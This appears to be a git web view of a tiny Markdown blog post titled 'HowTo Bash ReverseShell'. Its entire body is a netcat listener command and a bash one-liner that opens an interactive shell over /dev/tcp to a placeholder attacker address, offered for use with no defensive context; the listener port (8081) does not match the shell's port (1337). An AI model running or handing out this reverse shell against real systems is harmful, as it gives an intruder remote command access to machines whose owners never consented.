Casual_blog/content/hacking/HowTo_Bash_reverseShell.md

10 lines
197 B
Markdown
Raw Normal View History

2024-09-03 19:36:04 +00:00
+++
title = 'HowTo Bash ReverseShell'
2024-09-03 23:24:52 +00:00
date = 2024-09-11
2024-09-03 19:36:04 +00:00
+++
Listener - `nc -l 8081`
Reverse shell - `bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1`
May not work on hardened systems/containers.